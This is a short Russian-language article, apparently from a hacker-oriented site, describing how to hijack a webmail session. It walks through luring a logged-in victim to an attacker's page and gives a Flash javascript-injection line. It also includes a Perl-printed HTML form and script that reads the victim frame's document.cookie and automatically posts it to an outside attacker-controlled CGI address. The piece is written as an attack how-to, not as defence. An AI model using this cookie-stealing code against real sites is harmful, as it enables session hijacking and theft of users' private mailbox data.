Безопасность

Самый обычный вариант аутентификации, используемый на большинстве крупных сайтов: при входе на страницу пользователь аутентифицируется парой логин/пароль, после чего создается сессия, которая ограничивается либо закрытием браузера, либо временем. Сессия может привязываться к IP.

Вы думаете тут ничего не поделать? У таких крупных систем обычно существует система восстановления паролей. А сценарий взлома, например, почтового ящика будет выглядеть так: посылаем жертве письмо с ссылкой на свою страничку, либо используем Flash/Action Script –> JScript:

GetUrl(”javascript:alert(“123”);”);

При получении почты у жертвы создана сессия, в это время жертве доступны все параметры ящика для чтения (кроме пароля). Таким образом жертва, зайдя на вашу страницу, сама того не зная, открывает в фреймах странички с параметрами, при этом отправляя их содержимое вам же. Это несложно реализуется примерно следующим скриптом (написанным на Perl), который вызывается из фрейма:

(для cookie)

print <<OPA;

<form action="http://yourpage.h10.ru/cgi-bin/securecheck.pl" method="POST"

name="forma">

<input type=hidden name=hin>

</form>

<script language="jscript">

onload=function () {

    setTimeout(

        function () {

document.forma.hin.value=document.getElementById("oVictim").document.cookie;

document.forma.submit();

        },

        100

    );

}

</script>